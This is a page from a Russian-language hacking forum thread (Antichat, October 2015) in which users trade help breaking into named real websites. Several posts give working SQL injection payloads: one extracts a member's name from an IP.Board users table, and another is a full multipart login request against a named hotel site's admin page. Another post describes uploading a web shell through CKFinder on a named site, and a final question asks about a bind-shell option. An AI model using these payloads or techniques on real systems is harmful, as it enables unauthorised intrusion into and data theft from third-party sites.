HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 74 из 296 « Первая < 2464 70 71 72 73 74 75 76 77 78 84124174 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #731  
Старый 19.10.2015, 23:55
RedFern.89
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
С нами: 8582863

Репутация: 69
По умолчанию
Цитата:
Сообщение от ButilkaSoka  

/news'and(select!x-~0.FROM(select+(select concat(0x3c62723e,name,0x3c62723e) from ipb_members where member_id='15664')x)f)and'/
http://prntscr.com/8t332x

через браузер. через burp suite запрос прерывается там же
 
Ответить с цитированием

  #732  
Старый 20.10.2015, 00:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Код:
/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c62723e))from(ipb_members)where(member_id='15664'))x)f)and'/
 
Ответить с цитированием

  #733  
Старый 20.10.2015, 00:05
RedFern.89
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
С нами: 8582863

Репутация: 69
По умолчанию
Цитата:
Сообщение от yarbabin  

/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c6 2723e))from(ipb_members)where(member_id='15664'))x )f)and'/
спасибо, все работает
 
Ответить с цитированием

  #734  
Старый 20.10.2015, 10:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от SaNDER  

_ttp://vulkan.site/.htaccess
Код:
RewriteEngine On

RewriteRule ^go/([p0-9]*)/([a-zA-Z0-9]+)/?$ /go.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^go/([p0-9]*)/?$ /go.php?pid=$1 [QSA,L]

RewriteRule ^imp/([p0-9]*)/([a-zA-Z0-9]+)/?$ /imp.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^imp/([p0-9]*)/?$ /imp.php?pid=$1 [QSA,L]

RewriteRule ^events/([A-Za-z]+)/?$ /eventapi/api.php?action=$1 [QSA,L]

RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/?$ /index.php?pid=$1 [QSA,L]

RewriteRule ^(p[0-9]*)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA]
RewriteRule ^(p[0-9]*)/?$ /index.php?pid=$1 [QSA]
Можно что-нибудь сделать?
можно узнать, как настроен rewriterule. а что вы хотите?
 
Ответить с цитированием

  #735  
Старый 20.10.2015, 21:36
xivi00
Познающий
Регистрация: 23.11.2013
Сообщений: 46
С нами: 6563126

Репутация: 0
По умолчанию
http://www.bogema-hotel.ru/access_admin.php в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться
 
Ответить с цитированием

  #736  
Старый 20.10.2015, 21:45
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию
Цитата:
Сообщение от xivi00  

http://www.bogema-hotel.ru/access_admin.php
в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться
-----------------------------219001973211145\r\n

Content-Disposition: form-data; name="authorize"\r\n

\r\n

1\r\n

-----------------------------219001973211145\r\n

Content-Disposition: form-data; name="login"\r\n

\r\n

admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n

-----------------------------219001973211145\r\n

Content-Disposition: form-data; name="password"\r\n

\r\n

sdsdgsg\r\n

-----------------------------219001973211145--\r\n

зачем sqlmap здесь?
 
Ответить с цитированием

  #737  
Старый 21.10.2015, 00:38
xivi00
Познающий
Регистрация: 23.11.2013
Сообщений: 46
С нами: 6563126

Репутация: 0
По умолчанию
Цитата:
Сообщение от Br@!ns  

-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="authorize"\r\n
\r\n
1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="login"\r\n
\r\n
admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
sdsdgsg\r\n
-----------------------------219001973211145--\r\n
зачем sqlmap здесь?
руками не дорос еще крутить
 
Ответить с цитированием

  #738  
Старый 21.10.2015, 00:57
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от xivi00  


xivi00 said:

http://www.bogema-hotel.ru/access_admin.php
в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться
/threads/424557/page-13#post-3861751
 
Ответить с цитированием

  #739  
Старый 21.10.2015, 11:31
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию
помогите пожалуйста здесь в ckfinder'e 1.4.2 можно как нибудь шел залить?

Как только не пробывал и через форму отдельную к connector'y и так

Получается так; _php;.txt

загруженный шел;

.SpoilerTarget" type="button">Spoiler: shell
aromagiya.kz/cms/uploads/files/Sh3LL_php;.txt
ckfinder:

.SpoilerTarget" type="button">Spoiler: ckfinder
aromagiya.kz/cms/files/appends/ckfinder/ckfinder.html
 
Ответить с цитированием

  #740  
Старый 21.10.2015, 21:11
Waki
Познающий
Регистрация: 09.10.2015
Сообщений: 54
С нами: 5576726

Репутация: 10
По умолчанию
Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ?

Как и когда это использовать, объясните если не трудно
 
Ответить с цитированием
Ответ
Страница 74 из 296 « Первая < 2464 70 71 72 73 74 75 76 77 78 84124174 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.